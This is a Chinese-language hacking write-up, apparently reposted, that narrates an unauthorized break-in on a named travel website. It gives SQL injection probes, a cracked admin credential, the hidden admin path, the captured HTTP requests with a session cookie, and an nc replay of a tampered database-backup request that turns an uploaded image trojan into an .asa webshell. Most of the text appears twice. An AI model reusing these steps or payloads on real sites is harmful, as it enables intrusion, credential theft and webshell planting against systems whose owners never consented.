数据库抓包另类备份的详细方法与解读
程序员文章站
2022-03-29 11:07:06
这是我之前在绿色兵团时写的一篇文章,是我自己原创的,思路借鉴了一篇t00ls里的,进行了改进... 12-06-27...
这是我之前在绿色兵团时写的一篇文章,是我自己原创的,思路借鉴了一篇t00ls里的,进行了改进。我在绿色兵团的账号名字也是leisureforest
真实性毋庸置疑,希望给过。thanks
数据库抓包另类备份
地址https://www.jb51.net/(仅用于替代目标网站,非本站)
数据库抓包另类备份
又是旅游网。我刚才发了一篇文章,正想走,外面下雨了。实在是闲的难受。再写这个,提提我人气。
数据库抓包另类备份
这个地址是一个家伙发给我的,他说让我试一试,我随便找了个链接http://www.kmholiday.com/travel/travel_line_view.asp?lineid=1030’加了个特殊字符,马上返回错误信息
数据库抓包另类备份
microsoft jet database engine
数据库抓包另类备份
错误'80040e14'
语法错误(操作符丢失) 在查询表达式'id=1030‘' 中。
数据库抓包另类备份
/travel/travel_line_view.asp,行 41
数据库抓包另类备份
数据库抓包另类备份
什么意思嘛。这不明摆着让我搞他。access的数据库,直接上语句,and exists(select * from msysobjects)
数据库抓包另类备份
数据库抓包另类备份
microsoft jet database engine
数据库抓包另类备份
错误'80040e09'
数据库抓包另类备份
不能读取记录;在'msysobjects' 上没有读取数据权限。
数据库抓包另类备份
/travel/travel_line_view.asp,行41
数据库抓包另类备份
有这个表但是不能访问。好的 接着执行and exists(select * from admin) 正常页面 ;有admin表---- 帅
数据库抓包另类备份
and exists(select count(user) from admin)还是正常页面有user字段
数据库抓包另类备份
and exists(select count(psw from admin) 正常页面,密码字段。
数据库抓包另类备份
用户名aidy 密码28b9e7a5fadbdb964e9069bc82ac2af9 32位加密的,吓死我了。去md5搞了下,汗19850311 奶奶的,真唬人。这时我就给那人发信息了,这个也太简单了吧,还高什么,他说,拿到shell才算。好吧接着搞。
数据库抓包另类备份
找后台,这个可真难住我了。先上工具,扫了四万多条愣是没找到。其实这种情况他肯定有个目录很难差,根本不好搞,怎么办,还是google ,用了好几个语句,只找到俩登陆页面但是都不对。还是回到首页看图片,但是右键不能使用,不让查看属性。最后下载的时候从迅雷里看的地址。我真有办法哈哈……
数据库抓包另类备份
找到这个页面了http://www.kmholiday.com/adminsheeninfo/直接跳转登陆。
数据库抓包另类备份
进去之后发现有数据库备份。先找了个上传,上传了个图片木马正当我兴致勃勃地来备份的时候,出问题了,原来备份路径不能修改。也就是说你备份只能备份mdb数据库文件,备份之后的文件名为asa,这个倒是没问题,iis可以解析,关键是路径不让动,这可难死我了,怎么办呢。还是右键查看源码吧。找到了这个链接
数据库抓包另类备份
https://www.jb51.net/ adminsheeninfo/oledit/ewebeditor/汗,又是编辑器,编辑器啊编辑器,又是你,都不想搞了,进入编辑器,登陆页面也没有删除。现在我写文章的时候被删了,我知道是谁删的(不是我),不截图了。进去还是那个用户名密码。找到样式管理,原来的样式保存按钮被删除了,他以为这样就安全了。那么我copy了一个样式,在新创建的样式里,添加了asp格式。asa.但是都没有成功,其实如果在这里添加aaspsp就可以了,但是我没想到他有这么蠢的漏洞,我就没这么搞。难道我会拿不到shell。不可能。
数据库抓包另类备份
于是我苦思冥想,终于想到了一句话木马。后来一看人家两年前就有人想到这个方法了,就是在添加新闻那里插入一个新闻抓下包,然后改新闻内容为自己的一句话nc提交、如下图
数据库抓包另类备份
抓包内容如下
数据库抓包另类备份
post /adminsheeninfo/oledit/upload.asp?action=remote&type=remote&style=s_light http/1.1
accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/qvod, application/qvod, */*
referer: http://www.kmholiday.com/adminsh ... s&style=s_light
accept-language: zh-cn
content-type: application/x-www-form-urlencoded
accept-encoding: gzip, deflate
user-agent: mozilla/4.0 (compatible; msie 6.0; windows nt 5.1; sv1)
host: www.kmholiday.com
content-length: 33
connection: keep-alive
cache-control: no-cache
cookie: cck_lasttime=1312255680031; cck_count=0; aspsessionidsqqsdttt=pnfacnhdbnbmafnbnhhhbfcp
数据库抓包另类备份
ewebeditor_uploadtext=ggggggggggg看到最后这里没有只抓到了内容没抓到路径,也就是说没法访问一句话,白玩了。
数据库抓包另类备份
看来这个还真不好搞。这时我想还是得用那个后台的备份,其实既然这里可以抓包后台那里也可以抓包的,说干就干。
数据库抓包另类备份
我点击后台数据库备份,抓到的内容如下
数据库抓包另类备份
post /adminsheeninfo/db_manage.asp?action=backupdata&act=backup http/1.1
accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/qvod, application/qvod, */*
referer: http://www.kmholiday.com/adminsh ... p?action=backupdata
accept-language: zh-cn
content-type: application/x-www-form-urlencoded
accept-encoding: gzip, deflate
user-agent: mozilla/4.0 (compatible; msie 6.0; windows nt 5.1; sv1)
host: www.kmholiday.com
content-length: 162
connection: keep-alive
cache-control: no-cache
cookie: cck_lasttime=1312255680031; cck_count=0; aspsessionidsqqsdttt=pnfacnhdbnbmafnbnhhhbfcp
数据库抓包另类备份
dbpath=%2fadminsheeninfo%2fdb%2fweb_date_%23_sheenzhaoghsy%26%23@%21.mdb&bkfolder=..%2f..%2fdatabase%2fdatabackup%2f&bkdbname=db_bak_20110802_1201247.asa&bknotes=
数据库抓包另类备份
大家看到最后这个链接没有,这个事什么意思呢,分析下先。dbpath=%2fadminsheeninfo%2fdb%2fweb_date_%23_sheenzhaoghsy%26%23@%21.mdb这个是原来的数据库名称,%23是空格,%2f是/的编码,转换之后就是/adminsheeninfo/db/web_date_#_sheenzhaoghsy&#@!.mdb备份后的数据库名称就是=..%2f..%2fdatabase%2fdatabackup%2f&bkdbname我们要修改原来的数据库名称为自己上传的图片马,随便一个吧,比如2011-8-2 12:07:04.jpg,我随便写的,吧原数据库路径改成这个,然后数出来原来的数据库路径的字符长度,比如是162(假设)我不数了,我记得当时数的是153,图片是64,然后用153-64=89那么就把原来的content-length: 162修改为89,然后用保存为qq.txt,文件名随便起。保存为txt文档。复制到c盘根目录下面
数据库抓包另类备份
用nc上传(nc也要放到c盘根目录)
数据库抓包另类备份
命令nc www.kmholiday.com 80<qq.txt。上传之后就会返回上传成功的提示。如下
数据库抓包另类备份
%2fadminsheeninfo%2foledit%2fuploadfile%2f2011730232015138.jpg 62
已经成功备份,你的数据库的路径:\hosting\wwwroot\kmholiday_cn\htdocs\adminsh eeninfo\../../database/databackup/\db_bak_20110730_231235.asa返回...
database/databackup/\db_bak_20110730_231235.asa
数据库抓包另类备份
这个就是备份之后的asp马地址d:\hosting\wwwroot\kmholiday_cn\htdocs\adminsh eeninfo\../../database/databackup/\db_bak_20110730_231235.asa用侠客客服端连接一下就可以了,然后上传自己的asp mm,访问,我没再截图,这样不好你懂的。
数据库抓包另类备份
好啦,看来看似简单的东西并不是那么容易得到,切莫眼高收低,像我一样,踏踏实实做事还是好些。
数据库抓包另类备份
真实性毋庸置疑,希望给过。thanks
数据库抓包另类备份
地址https://www.jb51.net/(仅用于替代目标网站,非本站)
数据库抓包另类备份
又是旅游网。我刚才发了一篇文章,正想走,外面下雨了。实在是闲的难受。再写这个,提提我人气。
数据库抓包另类备份
这个地址是一个家伙发给我的,他说让我试一试,我随便找了个链接http://www.kmholiday.com/travel/travel_line_view.asp?lineid=1030’加了个特殊字符,马上返回错误信息
数据库抓包另类备份
microsoft jet database engine
数据库抓包另类备份
错误'80040e14'
语法错误(操作符丢失) 在查询表达式'id=1030‘' 中。
数据库抓包另类备份
/travel/travel_line_view.asp,行 41
数据库抓包另类备份
数据库抓包另类备份
什么意思嘛。这不明摆着让我搞他。access的数据库,直接上语句,and exists(select * from msysobjects)
数据库抓包另类备份
数据库抓包另类备份
microsoft jet database engine
数据库抓包另类备份
错误'80040e09'
数据库抓包另类备份
不能读取记录;在'msysobjects' 上没有读取数据权限。
数据库抓包另类备份
/travel/travel_line_view.asp,行41
数据库抓包另类备份
有这个表但是不能访问。好的 接着执行and exists(select * from admin) 正常页面 ;有admin表---- 帅
数据库抓包另类备份
and exists(select count(user) from admin)还是正常页面有user字段
数据库抓包另类备份
and exists(select count(psw from admin) 正常页面,密码字段。
数据库抓包另类备份
用户名aidy 密码28b9e7a5fadbdb964e9069bc82ac2af9 32位加密的,吓死我了。去md5搞了下,汗19850311 奶奶的,真唬人。这时我就给那人发信息了,这个也太简单了吧,还高什么,他说,拿到shell才算。好吧接着搞。
数据库抓包另类备份
找后台,这个可真难住我了。先上工具,扫了四万多条愣是没找到。其实这种情况他肯定有个目录很难差,根本不好搞,怎么办,还是google ,用了好几个语句,只找到俩登陆页面但是都不对。还是回到首页看图片,但是右键不能使用,不让查看属性。最后下载的时候从迅雷里看的地址。我真有办法哈哈……
数据库抓包另类备份
找到这个页面了http://www.kmholiday.com/adminsheeninfo/直接跳转登陆。
数据库抓包另类备份
进去之后发现有数据库备份。先找了个上传,上传了个图片木马正当我兴致勃勃地来备份的时候,出问题了,原来备份路径不能修改。也就是说你备份只能备份mdb数据库文件,备份之后的文件名为asa,这个倒是没问题,iis可以解析,关键是路径不让动,这可难死我了,怎么办呢。还是右键查看源码吧。找到了这个链接
数据库抓包另类备份
https://www.jb51.net/ adminsheeninfo/oledit/ewebeditor/汗,又是编辑器,编辑器啊编辑器,又是你,都不想搞了,进入编辑器,登陆页面也没有删除。现在我写文章的时候被删了,我知道是谁删的(不是我),不截图了。进去还是那个用户名密码。找到样式管理,原来的样式保存按钮被删除了,他以为这样就安全了。那么我copy了一个样式,在新创建的样式里,添加了asp格式。asa.但是都没有成功,其实如果在这里添加aaspsp就可以了,但是我没想到他有这么蠢的漏洞,我就没这么搞。难道我会拿不到shell。不可能。
数据库抓包另类备份
于是我苦思冥想,终于想到了一句话木马。后来一看人家两年前就有人想到这个方法了,就是在添加新闻那里插入一个新闻抓下包,然后改新闻内容为自己的一句话nc提交、如下图
数据库抓包另类备份
抓包内容如下
数据库抓包另类备份
post /adminsheeninfo/oledit/upload.asp?action=remote&type=remote&style=s_light http/1.1
accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/qvod, application/qvod, */*
referer: http://www.kmholiday.com/adminsh ... s&style=s_light
accept-language: zh-cn
content-type: application/x-www-form-urlencoded
accept-encoding: gzip, deflate
user-agent: mozilla/4.0 (compatible; msie 6.0; windows nt 5.1; sv1)
host: www.kmholiday.com
content-length: 33
connection: keep-alive
cache-control: no-cache
cookie: cck_lasttime=1312255680031; cck_count=0; aspsessionidsqqsdttt=pnfacnhdbnbmafnbnhhhbfcp
数据库抓包另类备份
ewebeditor_uploadtext=ggggggggggg看到最后这里没有只抓到了内容没抓到路径,也就是说没法访问一句话,白玩了。
数据库抓包另类备份
看来这个还真不好搞。这时我想还是得用那个后台的备份,其实既然这里可以抓包后台那里也可以抓包的,说干就干。
数据库抓包另类备份
我点击后台数据库备份,抓到的内容如下
数据库抓包另类备份
post /adminsheeninfo/db_manage.asp?action=backupdata&act=backup http/1.1
accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/qvod, application/qvod, */*
referer: http://www.kmholiday.com/adminsh ... p?action=backupdata
accept-language: zh-cn
content-type: application/x-www-form-urlencoded
accept-encoding: gzip, deflate
user-agent: mozilla/4.0 (compatible; msie 6.0; windows nt 5.1; sv1)
host: www.kmholiday.com
content-length: 162
connection: keep-alive
cache-control: no-cache
cookie: cck_lasttime=1312255680031; cck_count=0; aspsessionidsqqsdttt=pnfacnhdbnbmafnbnhhhbfcp
数据库抓包另类备份
dbpath=%2fadminsheeninfo%2fdb%2fweb_date_%23_sheenzhaoghsy%26%23@%21.mdb&bkfolder=..%2f..%2fdatabase%2fdatabackup%2f&bkdbname=db_bak_20110802_1201247.asa&bknotes=
数据库抓包另类备份
大家看到最后这个链接没有,这个事什么意思呢,分析下先。dbpath=%2fadminsheeninfo%2fdb%2fweb_date_%23_sheenzhaoghsy%26%23@%21.mdb这个是原来的数据库名称,%23是空格,%2f是/的编码,转换之后就是/adminsheeninfo/db/web_date_#_sheenzhaoghsy&#@!.mdb备份后的数据库名称就是=..%2f..%2fdatabase%2fdatabackup%2f&bkdbname我们要修改原来的数据库名称为自己上传的图片马,随便一个吧,比如2011-8-2 12:07:04.jpg,我随便写的,吧原数据库路径改成这个,然后数出来原来的数据库路径的字符长度,比如是162(假设)我不数了,我记得当时数的是153,图片是64,然后用153-64=89那么就把原来的content-length: 162修改为89,然后用保存为qq.txt,文件名随便起。保存为txt文档。复制到c盘根目录下面
数据库抓包另类备份
用nc上传(nc也要放到c盘根目录)
数据库抓包另类备份
命令nc www.kmholiday.com 80<qq.txt。上传之后就会返回上传成功的提示。如下
数据库抓包另类备份
%2fadminsheeninfo%2foledit%2fuploadfile%2f2011730232015138.jpg 62
已经成功备份,你的数据库的路径:\hosting\wwwroot\kmholiday_cn\htdocs\adminsh eeninfo\../../database/databackup/\db_bak_20110730_231235.asa返回...
database/databackup/\db_bak_20110730_231235.asa
数据库抓包另类备份
这个就是备份之后的asp马地址d:\hosting\wwwroot\kmholiday_cn\htdocs\adminsh eeninfo\../../database/databackup/\db_bak_20110730_231235.asa用侠客客服端连接一下就可以了,然后上传自己的asp mm,访问,我没再截图,这样不好你懂的。
数据库抓包另类备份
好啦,看来看似简单的东西并不是那么容易得到,切莫眼高收低,像我一样,踏踏实实做事还是好些。
数据库抓包另类备份
下一篇: 拍照技巧秘诀:五个自拍技巧介绍